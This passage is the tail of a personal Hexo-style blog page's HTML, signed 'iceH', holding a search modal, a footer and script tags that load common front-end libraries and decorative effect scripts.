srcset="/img/loading.gif" class="rounded mx-auto d-block mt-5" style="width:300px;height:150px"></div></div><a id="scroll-top-button" href="#" role="button"><i class="iconfont icon-arrowup" aria-hidden="true"></i></a><div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true"><div class="modal-dialog modal-dialog-scrollable modal-lg" role="document"><div class="modal-content"><div class="modal-header text-center"><h4 class="modal-title w-100 font-weight-bold">搜索</h4><button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button></div><div class="modal-body mx-3"><div class="md-form mb-5"><input type="text" id="local-search-input" class="form-control validate"> <label data-error="x" data-success="v" for="local-search-input">关键词</label></div><div class="list-group" id="local-search-result"></div></div></div></div></div></main><footer class="text-center mt-5 py-3"><div class="footer-content"><span>iceH</span> <i class="iconfont icon-love"></i> <span>一条啥也不会的咸鱼！</span></div></footer><script src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js"></script><link rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css"><script>NProgress.configure({showSpinner:!1,trickleSpeed:200}),NProgress.start(),document.addEventListener("DOMContentLoaded",(function(){window.NProgress&&window.NProgress.inc()})),window.addEventListener("load",(function(){NProgress.done()}))</script><script src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js"></script><script src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js"></script><script src="/js/debouncer.js"></script><script src="/js/events.js"></script><script src="/js/plugins.js"></script><script src="/js/lazyload.js"></script><script src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js"></script><script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script><script src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js"></script><script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js"></script><script src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js"></script><script>!function(t,i){(0,Fluid.plugins.typing)(i.getElementById("subtitle").title)}(window,document)</script><script src="/js/local-search.js"></script><script>document.querySelector("#local-search-input").onclick=function(){searchFunc("/local-search.xml","local-search-input","local-search-result"),this.onclick=null}</script><script src="//cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/js/qipao.js"></script><script src="//cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/js/jingtaisidai.js"></script><script src="//cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/js/dianjichuzi.js"></script><script src="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script><script src="//cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script><script src="/js/boot.js"></script><link defer rel="stylesheet" href="/css/customize.css"></body></html>